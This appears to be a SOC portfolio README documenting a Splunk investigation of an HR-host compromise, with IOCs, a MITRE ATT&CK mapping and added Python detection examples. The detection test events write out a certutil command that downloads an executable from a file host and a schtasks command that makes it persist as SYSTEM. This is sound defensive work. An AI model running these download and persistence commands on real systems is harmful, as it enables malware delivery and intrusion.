Tam-George10/Siem-investigations
SIEM Investigations – Suspicious Process Execution (HR Department)

This repository documents a hands-on SOC investigation focused on identifying, analyzing, and responding to suspicious process execution activity on a host within the HR department. The project follows a real-world Blue Team workflow, including log ingestion, alert triage, user behavior analysis, LOLBIN and scheduled task investigation, network activity analysis, and threat intelligence correlation.


Investigation Scenario

An IDS alert indicated suspicious process execution on a host in the HR department, suggesting a potential compromise. Analysis revealed the execution of tools commonly associated with network information gathering and scheduled task creation, confirming malicious behavior.

Due to limited resources, only Windows process creation logs (Event ID 4688) were collected and ingested into Splunk under the win_eventlogs index. No network, file-system, or Sysmon telemetry was available, so the network and host findings below are derived from the command-line arguments recorded in those events and from external lookups of the indicators they contain.

Network Context

The organization’s network is divided into three departments:

IT Department

  • James
  • Moin
  • Katrina

HR Department

  • Haroon
  • Chris
  • Diana

Marketing Department

  • Bell
  • Amelia
  • Deepak

This segmentation was used to correlate suspicious activity to specific departments and users during the investigation.
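The roster-based correlation described above, as an added example that is not part of the original repository: it checks each 4688 SubjectUserName against the department roster, flags names that are unknown or that differ from a real user by a homoglyph or a single edit (Amel1a against Amelia), and flags a user running processes on another department's host. The first.last account convention (Chris.fort belonging to HR user Chris), the HR_/IT_/MKT_ hostname prefixes, and the sample events are assumptions made for the example.

```python
"""Added example, not the repository's own code: roster-based detection of
imposter and cross-department usernames in Windows Event ID 4688 records.

Assumptions (not stated in the README): account names follow first.last, so
Chris.fort is HR user Chris; hostnames start with a department prefix, so
HR_02 is an HR host; SAMPLE_EVENTS are constructed to resemble the
investigation's findings and are not real log data.
"""
from typing import Dict, List, Optional

# Department roster from the Network Context section above.
ROSTER: Dict[str, str] = {
    "James": "IT", "Moin": "IT", "Katrina": "IT",
    "Haroon": "HR", "Chris": "HR", "Diana": "HR",
    "Bell": "Marketing", "Amelia": "Marketing", "Deepak": "Marketing",
}
# Assumed hostname convention: department prefix, then a number (HR_02).
HOST_PREFIXES: Dict[str, str] = {"HR_": "HR", "IT_": "IT", "MKT_": "Marketing"}
# Digits attackers commonly swap for letters when building a lookalike name.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "4": "a", "7": "t"})


def base_name(account: str) -> str:
    """Reduce DOMAIN\\first.last or first.last@domain to the lower-case first name."""
    account = account.split("\\")[-1].split("@")[0]
    return account.split(".")[0].lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance; usernames are short, so the O(len(a)*len(b)) cost is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_user(account: str) -> dict:
    """Classify one SubjectUserName as known, lookalike (of a roster user) or unknown."""
    name = base_name(account)
    for real, dept in ROSTER.items():
        if name == real.lower():
            return {"verdict": "known", "matches": real, "department": dept}
    folded = name.translate(HOMOGLYPHS)
    for real, dept in ROSTER.items():
        # Homoglyph swap (Amel1a -> amelia) or a single-character edit of a real name.
        if folded == real.lower() or levenshtein(name, real.lower()) <= 1:
            return {"verdict": "lookalike", "matches": real, "department": dept}
    return {"verdict": "unknown", "matches": None, "department": None}


def host_department(host: str) -> Optional[str]:
    """Map a hostname to its department using the assumed prefix convention."""
    for prefix, dept in HOST_PREFIXES.items():
        if host.upper().startswith(prefix):
            return dept
    return None


def triage(events: List[dict]) -> List[dict]:
    """Return one finding per event whose user is unknown, a lookalike, or a
    member of a different department than the host they ran a process on."""
    findings = []
    for ev in events:
        user = classify_user(ev["SubjectUserName"])
        host_dept = host_department(ev["Computer"])
        reasons = []
        if user["verdict"] != "known":
            suffix = f' (resembles {user["matches"]})' if user["matches"] else ""
            reasons.append(f'{user["verdict"]} user{suffix}')
        if user["department"] and host_dept and user["department"] != host_dept:
            reasons.append(f'{user["department"]} user on {host_dept} host')
        if reasons:
            findings.append({"Computer": ev["Computer"],
                             "SubjectUserName": ev["SubjectUserName"],
                             "NewProcessName": ev["NewProcessName"],
                             "reasons": reasons})
    return findings


# Constructed sample events shaped like the 4688 fields the check needs.
SAMPLE_EVENTS = [
    {"Computer": "HR_02", "SubjectUserName": "Chris.fort",
     "NewProcessName": r"C:\Windows\System32\certutil.exe"},
    {"Computer": "HR_02", "SubjectUserName": "Amel1a",
     "NewProcessName": r"C:\Windows\System32\schtasks.exe"},
    {"Computer": "HR_02", "SubjectUserName": "Haroon",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "MKT_01", "SubjectUserName": "Amelia",
     "NewProcessName": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"Computer": "HR_02", "SubjectUserName": "CORP\\svc_backup",
     "NewProcessName": r"C:\Windows\System32\wscript.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["Computer"], f["SubjectUserName"], f["NewProcessName"], "->", "; ".join(f["reasons"]))
```

Run as a script it reports Amel1a on HR_02 twice over (a lookalike of Amelia, and a Marketing user on an HR host) and the unknown svc_backup account, while Chris.fort, Haroon and Amelia on their own hosts produce nothing. In Splunk the same roster would normally be a lookup table joined onto the 4688 events rather than a dictionary in code.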


Description

This project focuses on the full investigation and triage of suspicious process execution to determine whether it represents legitimate activity or malicious compromise within the HR department host.

Investigation Workflow Overview:

  • 🖥️ Log Collection & Ingestion – Gather Windows process execution logs (Event ID 4688) and ingest them into Splunk for structured analysis
  • 🔍 Alert Analysis & Triage – Review IDS alerts to identify hosts and processes of interest
  • 👤 User Activity Correlation – Map observed activity to network segmentation and departmental users to detect anomalous behavior and imposters
  • 🛠️ Scheduled Task & LOLBIN Investigation – Identify execution of Living-off-the-Land Binaries (LOLBINs) and scheduled tasks used for reconnaissance or payload delivery
  • 🌐 Network & Host Analysis – Determine which third-party sites were accessed, files downloaded, and endpoint artifacts present
  • 📂 Artifact Collection & Evidence Documentation – Extract downloaded files, record filenames, hashes, and other indicators of compromise for further triage
  • 📑 Reporting & MITRE ATT&CK Mapping – Document investigation findings, correlate with MITRE ATT&CK tactics and techniques, and provide actionable recommendations

All analysis was performed in a controlled environment to ensure safe handling of potentially malicious content.


Tools Used

  • Splunk: SIEM platform used for log ingestion, querying, and correlation
  • Windows Event Logs: Primary source of process execution information (Event ID 4688)
  • Vim / Text Editors: Used to review raw log data and extract relevant information

Utilities Used

  • Oracle VirtualBox: Provided an isolated sandbox environment for safely handling and analyzing potentially malicious files and logs.
  • Splunk Query Editor: Used to build, test, and refine SPL queries for analysis of event logs and alert correlation.
  • Browser / Network Tools: Standard browsers and online tools (e.g., VirusTotal, WHOIS lookups) used for network artifact investigation, IP reputation, and malware source verification.


Investigation Findings

1. Log Collection & Ingestion

[Screenshot: March Logs]

2. Alert Analysis & Initial Triage

  • IDS alert identified suspicious process execution on the HR host HR_02
  • Suspicious username observed: Amel1a (a lookalike of the Marketing user Amelia)
  • Timeline of suspicious processes: 3/5/22 12:54:30.000 PM

[Screenshot: IDS Alert]

3. User Activity Correlation

[Screenshot: User Activity]

4. Scheduled Task & LOLBIN Investigation

[Screenshot: LOLBIN Execution]

5. Network Analysis

[Screenshot: Network Activity]

6. Host Analysis

[Screenshot: Host Activity]


Indicators of Compromise (IOCs)

  • Imposter Username: Amel1a
  • Legitimate Lookalike Username: Amelia
  • Compromised User Account: Chris.fort
  • Compromised User Account: Haroon
  • Affected Department: Human Resources (HR)
  • Affected Host: HR_02
  • Malicious Scheduled Task Name: OfficUpdater
  • Persistence Mechanism: Windows Scheduled Task (schtasks)
  • LOLBIN Used: certutil.exe
  • Downloaded Payload Name: Benign.exe
  • Payload Execution Date: 2022-03-04
  • Payload Execution Time: 10:38:28 AM
  • External Domain Contacted: controlc[.]com
  • External URL: https://controlc[.]com/e4d11035
  • Payload Source Type: Third-party file hosting service
  • Log Source: Windows Event Logs (Event ID 4688)

MITRE ATT&CK Mapping

  • T1036 – Masquerading
    The imposter account Amel1a closely resembled the legitimate Marketing user Amelia (the digit 1 substituted for the letter i), indicating account-name masquerading.
  • T1078 – Valid Accounts
    Legitimate HR user accounts (Chris.fort, Haroon) were used to execute malicious activity.
  • T1053.005 – Scheduled Task/Job: Scheduled Task
    A scheduled task (OfficUpdater) was created with schtasks to establish persistence and execute the malicious binary on system startup.
  • T1218 – System Binary Proxy Execution (named Signed Binary Proxy Execution in older ATT&CK versions)
    The native Windows utility certutil.exe was abused as a Living-off-the-Land Binary (LOLBIN) to bypass security controls.
  • T1105 – Ingress Tool Transfer
    The payload Benign.exe was downloaded from an external source using certutil.exe.
  • T1071.001 – Application Layer Protocol: Web Protocols
    The infected host communicated with a third-party web service (controlc[.]com) over HTTP(S).

Final Assessment & Recommendations

The investigation confirmed that the suspicious process execution activity observed on the HR department host HR_02 was the result of a genuine compromise. Analysis of Windows process creation logs (Event ID 4688) revealed multiple stages of attacker activity, including account masquerading, persistence establishment, and malicious payload delivery using native system utilities.

A suspicious imposter account (Amel1a) was identified during log review, closely resembling a legitimate user account (Amelia). Further analysis revealed abuse of valid HR user accounts (Chris.fort and Haroon) to execute scheduled tasks and download an external payload using the Living-off-the-Land Binary certutil.exe. The payload was retrieved from a third-party file-sharing service and successfully written to disk, confirming post-compromise activity.

Based on the collected evidence, the following actions are recommended:

  • Immediate account remediation: Reset passwords and review access privileges for all affected and related HR user accounts, including monitoring for additional imposter or lookalike usernames.
  • Persistence eradication: Identify and remove unauthorized scheduled tasks, including the task named OfficUpdater, and verify system startup configurations across HR hosts.
  • LOLBIN abuse prevention: Restrict or monitor execution of high-risk native utilities such as certutil.exe through endpoint protection policies and application control.
  • Network containment: Block identified external infrastructure, including the defanged domain controlc[.]com and associated URLs, at network security and proxy layers.
  • Threat detection enhancement: Create and deploy SIEM correlation rules to detect scheduled task creation, certutil-based downloads, and execution of binaries from temporary user directories.
  • Post-incident monitoring: Increase monitoring across HR department systems for signs of lateral movement, repeated execution attempts, or additional payload retrieval.
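The three detection rules recommended above (certutil-based downloads, scheduled task creation, and execution from user temp directories), as an added example that is not part of the original repository, implemented over 4688 records so they can be exercised offline before being turned into SIEM searches. The sample events mirror the README's IOCs (certutil.exe, OfficUpdater, Benign.exe, controlc[.]com), but the exact command lines, paths, timestamps, and which of the two compromised accounts ran which step are assumptions, not the investigation's real logs.

```python
"""Added example, not the repository's own code: the three SIEM correlation
rules recommended above, evaluated over Windows Event ID 4688 records, plus a
per-host escalation step that ties the separate hits together.

SAMPLE_EVENTS are constructed to mirror the README's IOCs; the command lines,
paths and timestamps are assumptions, not copied from the investigation's logs.
"""
import re
from typing import Callable, Dict, List

# Rule 1: certutil invoked as a downloader (-urlcache plus a URL argument).
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.IGNORECASE)
# Rule 2: schtasks creating a task; the task name follows /tn.
SCHTASKS_CREATE = re.compile(r'schtasks(\.exe)?\s+/create\b.*?/tn\s+"?(?P<task>[^"\s]+)', re.IGNORECASE)
# Rule 3: a process image located under a user's Temp or Downloads directory.
USER_TEMP_DIR = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData\\Local\\Temp|Downloads)\\", re.IGNORECASE)
URL = re.compile(r"""https?://[^\s"']+""")


def defang(url: str) -> str:
    """hxxps://host[.]tld/... form, so a finding can be pasted into a report safely."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme.replace('t', 'x')}://{host.replace('.', '[.]')}{slash}{path}"


def rule_certutil_download(ev: dict) -> str:
    """Return the defanged URL when certutil is fetching a file, else ''."""
    cmd = ev.get("CommandLine", "")
    if not CERTUTIL_DOWNLOAD.search(cmd):
        return ""
    return defang(URL.search(cmd).group(0))  # the rule regex guarantees a URL is present


def rule_schtasks_create(ev: dict) -> str:
    """Return the created task name when schtasks /create is seen, else ''."""
    m = SCHTASKS_CREATE.search(ev.get("CommandLine", ""))
    return m.group("task") if m else ""


def rule_exec_from_user_temp(ev: dict) -> str:
    """Return the image path when it lives in a user Temp/Downloads folder, else ''."""
    image = ev.get("NewProcessName", "")
    return image if USER_TEMP_DIR.search(image) else ""


RULES: Dict[str, Callable[[dict], str]] = {
    "certutil_download": rule_certutil_download,
    "schtasks_create": rule_schtasks_create,
    "exec_from_user_temp": rule_exec_from_user_temp,
}


def run_rules(events: List[dict]) -> List[dict]:
    """Evaluate every rule against every event; each hit carries the indicator it extracted."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            indicator = rule(ev)
            if indicator:
                findings.append({"rule": name, "Computer": ev["Computer"],
                                 "SubjectUserName": ev["SubjectUserName"],
                                 "TimeCreated": ev["TimeCreated"], "indicator": indicator})
    return findings


def escalate(findings: List[dict]) -> Dict[str, List[str]]:
    """Hosts that tripped two or more distinct rules: a download, a task and a
    temp-dir execution on one host is the chain seen here, not three one-offs."""
    per_host: Dict[str, set] = {}
    for f in findings:
        per_host.setdefault(f["Computer"], set()).add(f["rule"])
    return {host: sorted(rules) for host, rules in per_host.items() if len(rules) >= 2}


# Constructed sample events (not real log data) shaped like 4688 fields.
SAMPLE_EVENTS = [
    {"Computer": "HR_02", "SubjectUserName": "Chris.fort", "TimeCreated": "2022-03-04T10:37:55",
     "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://controlc.com/e4d11035 "
                    r"C:\Users\Chris.fort\AppData\Local\Temp\Benign.exe"},
    {"Computer": "HR_02", "SubjectUserName": "Haroon", "TimeCreated": "2022-03-04T10:38:02",
     "NewProcessName": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /create /tn OfficUpdater /tr "
                    r"C:\Users\Chris.fort\AppData\Local\Temp\Benign.exe /sc onstart /ru SYSTEM"},
    {"Computer": "HR_02", "SubjectUserName": "Chris.fort", "TimeCreated": "2022-03-04T10:38:28",
     "NewProcessName": r"C:\Users\Chris.fort\AppData\Local\Temp\Benign.exe",
     "CommandLine": "Benign.exe"},
    {"Computer": "IT_01", "SubjectUserName": "Katrina", "TimeCreated": "2022-03-04T11:02:10",
     "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Tools\installer.msi SHA256"},
    {"Computer": "HR_01", "SubjectUserName": "Diana", "TimeCreated": "2022-03-04T11:15:41",
     "NewProcessName": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks.exe /query /tn NightlyBackup"},
]

if __name__ == "__main__":
    hits = run_rules(SAMPLE_EVENTS)
    for h in hits:
        print(h["TimeCreated"], h["Computer"], h["SubjectUserName"], h["rule"], "->", h["indicator"])
    print("escalate:", escalate(hits))
```

Two caveats when porting these to production searches. Event ID 4688 only carries the command line if the audit policy "Include command line in process creation events" is enabled; without it rules 1 and 2 have nothing to match and only the image path check survives. And the benign certutil -hashfile and schtasks /query events are included deliberately: matching on the binary name alone would page on every certificate check and task listing, so the rules key on the downloader and creation switches instead.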

Case Closure

The incident was successfully investigated and documented using available host-based telemetry. All identified Indicators of Compromise (IOCs), including user accounts, command-line artifacts, file names, and external URLs, have been preserved for SOC reporting and future detection. The case has been formally closed following validation of findings and implementation of recommended remediation actions.

About

SIEM Investigations showcases SOC-style investigations focused on detecting, analyzing, and responding to real-world threats using SIEM techniques. It demonstrates hands-on log analysis, event correlation, alert triage, and incident response aligned with MITRE ATT&CK and practical Blue Team workflows.
